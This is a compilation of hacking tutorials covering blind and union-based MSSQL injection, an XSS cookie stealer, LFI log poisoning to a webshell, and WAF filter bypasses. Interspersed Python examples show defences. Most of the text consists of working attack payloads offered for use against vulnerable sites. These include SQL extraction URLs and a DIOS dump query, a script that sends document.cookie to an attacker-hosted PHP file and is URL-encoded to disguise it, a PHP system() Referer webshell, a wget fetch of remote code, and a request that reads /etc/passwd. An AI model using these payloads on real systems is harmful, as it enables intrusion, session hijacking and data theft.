Mssql Blind Sql Injection Tutorial Step By Step !


In this tutorial you will learn how to perform and exploit blind MSSQL SQL injection manually, step by step. So,

What is Blind MSSQL SQL Injection?

Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not fixed the code that is vulnerable to SQL injection.

In some cases, normal SQL injection does not work. Blind SQL injection is another method which may help you. The important point for blind SQL injection is the difference between the valid and the invalid query result: you have to inject a statement that makes the query valid or invalid and observe the response.

How To Test Sites For Blind MSSQL SQL Injection?

Let us assume that http://www.example.com/page.asp?id=1 is a normal URL of the website. So let's check whether the website is vulnerable by using true and false conditions like 1=2, 1=1, or 0>1.

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the results from these requests are different, that is a good signal for you: it means the website is vulnerable to blind MSSQL SQL injection. When you put "id=1 and 1=1", the condition is true, so the response must be normal. The parameter "id=1 and 1=2" makes the condition false, and if the webmaster does not apply a proper filter, the response differs from the previous one.
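The reason the true and false probes above produce different responses is that the id value is pasted into the SQL text. The following Python script is an added example, not part of the original tutorial, that reproduces that behaviour against an in-memory SQLite table standing in for the page.asp lookup (SQLite is an assumption made so the script runs anywhere; the contrast is the same on MSSQL) and compares it with the fixed version that validates the type and binds the value as a parameter. The table name pages and its sample rows are constructed for the demonstration.

```python
import sqlite3

# Constructed sample table standing in for the page.asp?id=1 lookup in the
# tutorial. SQLite is used because it ships with Python; the contrast between
# string concatenation and bound parameters is the same on MSSQL.
SAMPLE_ROWS = [(1, "home"), (2, "about"), (3, "contact")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """Builds the statement by concatenation: whatever follows id= becomes
    part of the SQL, so 'and 1=2' rewrites the WHERE clause."""
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, raw_id):
    """Rejects anything that is not an integer, then binds the value. The
    database receives the SQL text and the value separately, so the value
    can never be parsed as SQL."""
    try:
        page_id = int(raw_id)
    except ValueError:
        return []  # identical response for every malformed id: no oracle
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in rows]


def compare(raw_id):
    """Returns (vulnerable result, parameterized result) for one id value."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, raw_id), lookup_parameterized(conn, raw_id)
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("1", "1 and 1=1", "1 and 1=2", "1 and 0>1"):
        vuln, safe = compare(probe)
        print(f"{probe!r:16} concatenated={vuln} parameterized={safe}")
```

With the concatenated query the true probe returns the page and the false probe returns nothing, which is exactly the difference the tutorial observes. With the parameterized query all three probes produce the same empty response, so there is no difference left to observe.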

Extracting data through Blind MSSQL SQL Injection

By using blind MSSQL SQL injection you can extract the database, but you have to spend more time on it: each batch of queries yields only one character of a word.

Let me explain with an example of querying the first character of the database name. We assume that the database name is member. Therefore, the first character is "m", whose ASCII value is 109. (At this point, we assume that you know ASCII codes.)

OK. First, we have to know that the results from these requests have only two forms.

The following steps are up to each person; your idea of which ASCII values to test may differ from ours.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation, the result will be a valid query result, like http://www.example.com/page.asp?id=1 and 1=1 (because the first character of the database name is "m", whose ASCII code is 109). Then we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

It is certain that the result will be like http://www.example.com/page.asp?id=1 and 1=2 (because 109 is less than 120).
Then we will try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is a valid query result, so at this point the ASCII value of the first character of the database name is between 105 and 120.
So we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of the database name has an ASCII value which is greater than 108
but not greater than 109. Thus, we can conclude that the ASCII value is equal to 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We are sure that the result is like the result of http://www.example.com/page.asp?id=1 and 1=1

The rest of what you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.

Extracting table names through Blind MSSQL SQL Injection

In order to get a table name, we can use the above method to obtain each character of the table name. The only thing we have to do is change the query to retrieve a table name from the current database. Because MSSQL does not have a LIMIT command, the query is a bit more complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97

The above query is used to determine the first character of the first table in the current database. If we want to find the second character of the first table, we can do so with the following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We change the second parameter of the SUBSTRING function from 1 to 2 in order to specify the position of the character in the table name.
Thus, if we want to determine other positions, we only need to change the second parameter of SUBSTRING.

For other tables, we can find the other table names by changing the second SELECT
from "SELECT TOP 1" to "SELECT TOP 2", "SELECT TOP 3" and so on. For example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind MSSQL SQL Injection

After we obtain the table names, the next target is, naturally, the column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

In order to get around magic-quote filtering, you have to change 'tablename' into a concatenation of CHAR() calls. For example, if the table name is 'user', then when we put 'user' in the query the ' may be filtered and our query will be wrong. The solution is to convert 'user' into char(117)+char(115)+char(101)+char(114). So, the WHERE clause changes from "WHERE name='user'" to "WHERE name=char(117)+char(115)+char(101)+char(114)".

In this way, we can get around magic-quote filtering. The result of the above request is the first character of the first column name of the specified table.
When we want to find the second character of the first column, we can use the same method as for getting the table name, by changing the second parameter of the SUBSTRING function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request is used to determine the second character of the first column name in the specified table.
To determine other columns, we change the p.x value from 1 to 2, 3, 4 and so on, such as:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The first character of the second column name in the specified table can be determined by the above request.


Cookie Stealing From Cross Site Scripting ( xss ) Attack


Hello guys, in this post I will show you cookie stealing from a cross-site scripting (XSS) attack: how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial.

Pre-requisites:

  • A cookie stealer code: Get It From Here
  • Free web hosting.
  • Basic knowledge about XSS attacks.

Cookie stealing is the process in which an attacker exploits an XSS vulnerability and steals the cookies of victims who visit the infected link. These cookies are then used to compromise their accounts.

Creating PHP Cookie Stealer


  • Copy the cookie stealer code from here.
  • Open Notepad or any editor and paste the code.
  • Save the file with a .php extension, e.g. xss.php

Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name that the PHP file uses.
Now we have two files:
  1) xss.php
  2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both files. For hosting you can use free web hosting, or you can use secure tunnelling. After hosting, the stealer will be at: www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now that we have set everything up, we have to find a vulnerable website in which to inject our malicious code.

<script>location.href = 'http://www.site.com/xss.php?cookie='+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code into a site vulnerable to persistent XSS, it will stay there until the admin finds it. It will be shown to all users, so attackers don't need to send any link to others; whoever visits the page will be a victim.

Reflected: in the case of a non-persistent attack, the attacker sends the link to victims. Whenever they follow the link, it steals the cookie. Most sites are vulnerable to reflected XSS.

In the reflected case, attackers send the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. The attacker can URL-encode the script and shorten the link with a URL shortening service like TinyURL, then send it to the victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim opens the link, his/her cookie will be stored in the log.txt file.
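As an added example, not from the original post, the Python below audits Set-Cookie headers for the attributes that limit the attack just described: HttpOnly keeps the cookie out of document.cookie, Secure keeps it off plaintext HTTP, and SameSite=Lax or Strict stops the browser attaching it to most cross-site requests. The header values and cookie names are constructed for the demonstration; the function names are this example's own.

```python
# Constructed Set-Cookie values: the first is the kind of header a PHP app
# emits by default, the second carries only some of the hardening attributes.
SAMPLE_HEADERS = [
    "PHPSESSID=8f3c2a91b7d4e6f0; Path=/",
    "prefs=dark; Path=/; SameSite=None; Secure",
]


def parse_set_cookie(header_value):
    """Splits one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_set_cookie(header_value):
    """Returns (cookie name, list of missing hardening attributes)."""
    name, _, attrs = parse_set_cookie(header_value)
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")   # document.cookie can read it
    if "secure" not in attrs:
        missing.append("Secure")     # sent over plaintext HTTP
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        missing.append("SameSite")   # attached to cross-site requests
    return name, missing


def script_readable(header_values):
    """Names of cookies a page script (document.cookie) could read: every
    cookie that is not marked HttpOnly."""
    return [parse_set_cookie(h)[0] for h in header_values
            if "httponly" not in parse_set_cookie(h)[2]]


def build_session_cookie(name, value, max_age=3600):
    """Builds a Set-Cookie value carrying the attributes the audit expects.
    Separators and control characters in the value are rejected rather than
    encoded, since a session id should never contain them."""
    if not value or any(c in value for c in ";,= \t\r\n"):
        raise ValueError("invalid cookie value")
    return (f"{name}={value}; Path=/; Max-Age={max_age}; "
            f"HttpOnly; Secure; SameSite=Lax")


if __name__ == "__main__":
    for h in SAMPLE_HEADERS + [build_session_cookie("sid", "8f3c2a91b7d4e6f0")]:
        print(audit_set_cookie(h))
    print("readable by document.cookie:", script_readable(SAMPLE_HEADERS))
```

HttpOnly does not fix the XSS itself; it only removes the session cookie from what an injected script can read, which is why the audit flags it first.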


MSSQL Union Based Injection Step By Step


Today I am going to show you MSSQL union-based injection step by step. In this post I will only cover the basics. I don't see a lot of detailed tutorials on the Internet, so I am going to do what I can to help out based on my experience with MSSQL injections. First of all we need to know the basics of injecting. All the basics, including finding the type of injection, testing the database and finding the columns, are the same as for other databases, so I suggest you read the basics before you start here if you haven't yet.

So, let's start 😀

  • The checking part is the same as for MySQL: first put a single quote, then a double quote, and check the error. From this I came to know this one is a single-quote-based injection.
    www.site.com/?id=1%27 [ Error ]
    www.site.com/?id=1%22 [ Error ]

Remember: when both the single quote and the double quote give an error, there is a high probability that the injection type is integer based, because with a single-quote-based injection the double quote does not give an error, and with a double-quote-based injection the single quote does not give an error. When both give an error, apply the golden rule that the injection is integer type.

  • Now let's break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means the total number of columns is 5.

  • Now we can continue with ORDER BY, and in the end we come to know that 5 is the last working column. The next part is using the UNION SELECT query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
[screenshot: the error the site returns for the UNION SELECT request]

If you get this error, then in such cases we have the option to use NULL.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • Now we have to convert each column one by one to @@version or db_name(); you will see in the video how I did it ;).
  • Now when we put @@version in the column, if the column is vulnerable it shows the version, something like this..
    [screenshot: the version string displayed in the vulnerable column]

There are some other ways to collect more information from MSSQL, which are given here:

  1. @@version – gives the version
  2. db_name() – gives the name of the database
  3. user, system_user, current_user, user_name – give the current user
  4. @@SERVERNAME – gives info about the hostname
  • Now we will extract the table names. Here the syntax is a little different from MySQL because of the lack of a LIMIT clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way, increase the TOP value. But in the video I have shown only DIOSing the site.
  • Now in the same manner we can extract the column names. Let's see..
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now let's dump the data from the tables and columns. Here for concatenation we can use %2b, which is '+'.
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from tablename --

Now we have almost done this. Now let's come to the DIOS part.

This DIOS was created by my friends Zen and Rummy. By DIOSing the site we can make the whole process faster.

How to DIOS the MSSQL site:

DIOS

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the UNION SELECT and fix the query, then add the DIOS and execute, as shown below. For more details see the video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give an error, but actually it is making the DIOS table, so now let's try checking the output under Ahmed1.

[screenshot: the complete output selected from the Ahmed1 table]

  • And here we got the complete output at once. Before I finish I'd like to show you some basic errors in MSSQLi.

So here we finish MSSQL union-based injection. Keep practicing and learning, guys.
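Both the blind tutorial and this union-based post leave a distinctive trail in the web server's access log: pairs of true and false conditions, repeated ASCII(SUBSTRING(...)) comparisons with shifting thresholds, UNION SELECT, and stacked batches beginning with ;begin declare. The Python below is an added example, not part of either post, that percent-decodes the request target until it stops changing, tags each line with the pattern family it matches, and reports clients whose responses on one path flip between two sizes, which is what the boolean oracle looks like from the server side. The log lines, IP addresses, timestamps and response sizes are constructed; the rule names and thresholds are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in Common Log Format, modelled on the request
# shapes shown in the two MSSQL posts. IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /page.asp?id=1%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /page.asp?id=1%20and%201=2 HTTP/1.1" 200 812
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>90 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2024:10:00:05 +0000] "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>120 HTTP/1.1" 200 812
10.0.0.5 - - [12/Mar/2024:10:00:06 +0000] "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>105 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2024:10:01:00 +0000] "GET /?id=1%20and%20false%20UnIoN%20SeLeCt%201,2,3,4,5--%20- HTTP/1.1" 500 301
10.0.0.9 - - [12/Mar/2024:10:01:30 +0000] "GET /?id=1;begin%20declare%20@x%20varchar(8000)%20set%20@x=@@version%20end-- HTTP/1.1" 500 301
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /page.asp?id=2 HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

# Pattern families, matched against the decoded request target.
RULES = [
    ("boolean-probe", re.compile(r"\b(and|or)\s+\d+\s*[=<>]+\s*\d+\b", re.I)),
    ("char-oracle", re.compile(r"\b(ascii|substring|isnull)\s*\(", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("stacked-batch", re.compile(r";\s*(begin|declare|exec|insert|select)\b", re.I)),
]


def normalize(target):
    """Percent-decodes until the value stops changing so that double-encoded
    payloads are inspected in the form the database would see."""
    prev = None
    while target != prev:
        prev, target = target, unquote_plus(target)
    return target


def classify(target):
    """Returns the names of the rule families the request target matches."""
    decoded = normalize(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def analyze(log_text):
    """Per client: tag counts and, per path, the set of response sizes seen
    on tagged requests. Two sizes on one path is the true/false difference
    the blind technique relies on, observed from the server side."""
    clients = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if not tags:
            continue
        info = clients.setdefault(m["ip"], {"tags": defaultdict(int),
                                             "sizes": defaultdict(set)})
        for tag in tags:
            info["tags"][tag] += 1
        info["sizes"][urlsplit(m["target"]).path].add(m["bytes"])
    return clients


def alerts(log_text, min_hits=3):
    """Returns (ip, tagged request count, sorted tags, oracle seen) for each
    client worth a ticket: many probes, or any UNION/stacked attempt."""
    out = []
    for ip, info in analyze(log_text).items():
        total = sum(info["tags"].values())
        oracle = any(len(sizes) >= 2 for sizes in info["sizes"].values())
        severe = {"union-select", "stacked-batch"} & set(info["tags"])
        if total >= min_hits or severe:
            out.append((ip, total, sorted(info["tags"]), oracle))
    return sorted(out)


if __name__ == "__main__":
    for row in alerts(SAMPLE_LOG):
        print(row)
```

The response-size check matters more than the keyword rules: a character-by-character extraction is hundreds of requests to one path whose size alternates between exactly two values, which stands out even when the payload itself is obfuscated.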

Spawning a Shell by LFI Poisoning Log Files


Welcome, Padawan!
A while ago, a friend sent me a link to a challenge. I found one of the pages vulnerable to SQL injection, injected it, extracted the admin's credentials and, as soon as I logged in to the "Admin Panel", found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that, but they weren't working/there. 🙁 ..

The only thing I didn't try was LFI log file poisoning, but it was time to unchain the beast ..
I included the "Apache HTTP configuration file" and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

[screenshot: the Apache configuration with the log directive piped to the bash script]

Me likey 🙂 .. Then, of course, I included the bash script. These were its contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

# Apache pipes each log line to this script on stdin; an empty line ends it.
while : ; do
    read line
    [ -z "$line" ] && exit

    # Pull the virtual host name out of a "[host:example.tld] " prefix, if present.
    DOMAIN=""
    if [[ "$line" =~ \[host:([^\]]+) ]]; then
        DOMAIN=${BASH_REMATCH[1]}
    fi

    if [ -n "$DOMAIN" ]; then
        # Strip the host prefix and append the line to that vhost's daily log.
        echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
        chown apache:apache "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
    else
        echo "${line}" >> "/var/www/html/error_${DATE}.log"
        chown apache:apache "/var/www/html/error_${DATE}.log"
    fi
done

What does this do? It creates a .log file in "/var/www/html/domain.tld/logs/" named "error_YYYY-MM-DD", and according to the Apache config, the URL, Referer and time were sent to this bash script, which then saved them to the file .. So, I just had to visit a non-existent page *to get a 404* with my Referer set to "<?php system('wget http://x.com/y.txt -O z.php'); ?>" or any of its equivalents .. and then include the .log file to execute the code 😉

curl -e "<?php system($_POST['x']) ?>" http://domain.tld/blablabla.ext

[screenshot: the curl request with the PHP payload in the Referer header]

curl --data "x=cat /etc/passwd" "http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log"

[screenshot: the contents of /etc/passwd returned through the included log file]

I guess we’re done here 😀
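The include above works because the param value is joined to a file path with no validation, so ../ sequences walk to the log directory the attacker can write to. As an added example, not the challenge's or the author's code, the Python below contrasts that pattern with an include resolver that only accepts names from an allow-list, refuses separators and traversal, and checks that the resolved real path stays inside a pages directory. The temporary web-root layout, the file names, the ALLOWED set and the function names are all constructed for the demonstration.

```python
import os
import tempfile

# Constructed web-root layout standing in for the challenge's server: pages
# that may legitimately be included live under pages/, the poisoned daily
# error log lives under logs/.
ALLOWED = {"about", "contact"}


def make_webroot():
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "pages"))
    os.makedirs(os.path.join(root, "logs"))
    with open(os.path.join(root, "pages", "about.php"), "w") as f:
        f.write("<h1>About</h1>")
    with open(os.path.join(root, "logs", "error_2024-03-12.log"), "w") as f:
        f.write("GET /blablabla.ext 404 referer: <?php echo 'poisoned'; ?>")
    return root


def resolve_include_naive(param, root):
    """The pattern behind the vulnerable page: the parameter is joined to the
    web root and included if it exists, so ../ sequences reach any readable
    file, including the log the attacker just wrote to."""
    candidate = os.path.realpath(os.path.join(root, param))
    return candidate if os.path.isfile(candidate) else None


def resolve_include_safe(param, root):
    """Three independent checks: the name must be on the allow-list, it must
    not contain separators or traversal, and the resolved real path must stay
    inside pages/. Returns None when any check fails."""
    if param not in ALLOWED:
        return None
    if "/" in param or "\\" in param or ".." in param:
        return None
    base = os.path.realpath(os.path.join(root, "pages"))
    candidate = os.path.realpath(os.path.join(base, param + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo(root):
    """Runs both resolvers over a legitimate name and a traversal value;
    returns which resolver served which file (or None)."""
    traversal = "pages/../logs/error_2024-03-12.log"
    return {
        "naive_about": resolve_include_naive("pages/about.php", root),
        "naive_traversal": resolve_include_naive(traversal, root),
        "safe_about": resolve_include_safe("about", root),
        "safe_traversal": resolve_include_safe(traversal, root),
    }


if __name__ == "__main__":
    for key, value in demo(make_webroot()).items():
        print(f"{key:16} -> {value}")
```

The allow-list alone would have stopped this challenge; the path checks are kept because the list tends to grow into a directory listing over time, and the realpath check still holds once it does.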

PS: after solving the challenge I found out the "official solution" was nothing like this; it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to successfully bypass that function plus other image-resizing functions .. There are various great articles written on that topic; here are some of them ..

Bypass illegal mix of collations in sql injection


In this post you will learn how you can bypass the error "illegal mix of collations" in SQL injection.

What is an illegal mix of collations?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted by the SQL server. Because many people use MySQL to store data in languages other than English, they need to select the comparison rules, which in turn depend on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defined at different levels, i.e. the server, the database, the table and the column level.

With UNION SELECT we combine the result sets of two or more SELECT statements. We already know that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types, and they must have the same collation! If they are different, we get an error.

Bypassing the Error

# Method 1

Define COLLATE:
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values.

# Method 2

By using the function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is: CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use the function CAST

You can also use CAST() to convert a string to a different character set. The syntax is: CAST(character_string AS character_data_type CHARACTER SET charset_name).

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--

# Method 4

Use the function UNHEX(HEX(xx))
UNHEX() –> interprets each pair of hexadecimal digits in the argument as a character and returns the resulting binary string
HEX() –> returns a hexadecimal representation of a decimal or string value

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Hope this will help you with the illegal mix of collations error. Keep learning and practising.

Thanks for reading, guys. 🙂

Sql Injection – Inject A Site When Commas Are Blocked


In this tutorial I will show you how to inject a site when commas are blocked. Injecting a site when commas are blocked is quite easy.

There are many methods to bypass comma blocking in SQL injection.

# Method 1

By putting the , in a comment, like

union select 1/*!,*/ 2/*!,*/ 3

OR

union select 1/*,*/ 2/*,*/ 3

# Method 2

We can use CHAR(44). 44 is the ASCII value of the comma. After regular commas are stripped out by the WAF, those written as CHAR may remain.

union select 1,CHAR(44), 2,CHAR(44), 3

# Method 3

We can use JOIN.

